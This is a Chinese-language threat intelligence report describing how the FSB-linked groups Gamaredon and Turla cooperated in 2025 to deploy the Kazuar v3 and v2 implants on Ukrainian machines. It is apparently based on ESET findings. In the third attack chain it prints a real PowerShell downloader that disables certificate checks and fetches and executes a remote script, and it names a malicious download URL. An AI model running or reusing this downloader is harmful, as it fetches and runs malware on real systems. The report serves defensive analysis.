威胁组织概况

Gamaredon
自2013年起活跃，主要针对乌克兰政府机构。乌克兰安全局(SSU)将其归因于FSB第18中心，该组织与我们发现并命名为InvisiMole的威胁组织存在协作关系。

Turla
又名Snake，是著名的网络间谍组织，自2004年起活跃，可能追溯至1990年代末。被认为隶属于FSB，主要针对欧洲、中亚和中东的高价值目标，如政府和外交实体。

攻击概述

2025年2月，通过ESET遥测数据，我们在乌克兰检测到四起Gamaredon-Turla联合入侵事件。在这些机器上，Gamaredon部署了多种工具（包括PteroLNK、PteroStew、PteroOdd、PteroEffigy和PteroGraphin），而Turla仅部署了Kazuar v3。

在其中一台机器上，我们捕获到有效载荷，显示Turla能够通过Gamaredon植入物发出命令。PteroGraphin被用于重启Kazuar，可能是在Kazuar崩溃或未自动启动后。因此，PteroGraphin很可能被Turla用作恢复方法。

受害者分析

过去18个月中，我们在乌克兰的七台机器上检测到Turla。我们认为Gamaredon在2025年1月入侵了前四台机器，而Turla在2025年2月部署了Kazuar v3。所有案例中，ESET端点产品都是在两次入侵后才安装。

第一条攻击链：重启Kazuar v3

时间线

• 2025-01-20：Gamaredon在机器上部署PteroGraphin
• 2025-02-11：Turla在机器上部署Kazuar v3
• 2025-02-27：PteroGraphin下载PteroOdd
• 2025-02-27：PteroOdd下载有效载荷，执行Kazuar
• 2025-02-28：PteroOdd下载另一个有效载荷，同样执行Kazuar

事件详情
PteroGraphin位于%APPDATA%\x86.ps1，是一个通过Telegra.ph提供加密通道的下载器。PteroGraphin包含编辑Telegra.ph页面的令牌，任何知晓此令牌的人都可以操纵内容。

PteroOdd下载的解码命令显示，它首先将受害者计算机名和系统驱动器卷序列号上传到Cloudflare Worker子域，最后通过侧加载执行Kazuar。

Kazuar v3技术特性

Kazuar v3是Kazuar家族的最新分支，是高级C#间谍植入物。相比v2增加了约35%的代码行，引入了额外的网络传输方法：Web Socket和Exchange Web Services。Kazuar v3可以具有三种角色之一（KERNEL、BRIDGE或WORKER），恶意软件功能在这些角色间划分。

第二条攻击链：通过PteroOdd部署Kazuar v2

2025年4月18日，我们检测到PteroOdd样本从Telegra.ph下载有效载荷。下载的脚本包含额外的base64编码脚本，即PowerShell下载器PteroEffigy。

该PowerShell有效载荷从https://eset.ydns[.]eu/scrss.ps1下载并执行另一个有效载荷。scrss.ps1被证实是Turla的Kazuar v2安装程序，表明Gamaredon代表Turla部署了Kazuar。

第三条攻击链：通过PteroPaste部署Kazuar v2

2025年6月5日和6日，我们检测到Gamaredon在乌克兰两台机器上部署Turla植入物。在这两种情况下，Gamaredon的PteroPaste都被捕获试图执行简单的PowerShell脚本。

base64编码字符串是以下PowerShell下载器：

1

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex(New-Object Net.WebClient).downloadString('https://91.231.182[.]187/ekrn.ps1');

下载的脚本ekrn.ps1与第二条攻击链中提到的scrss.ps1非常相似，同样投放并安装Kazuar v2。

结论

我们展示了Turla如何利用Gamaredon操作的植入物（PteroGraphin、PteroOdd和PteroPaste）来重启Kazuar v3并在乌克兰多台机器上部署Kazuar v2。我们现在高度确信这两个分别与FSB关联的组织正在合作，Gamaredon为Turla提供初始访问权限。

IoC指标

文件哈希

网络指标

MITRE ATT&CK技术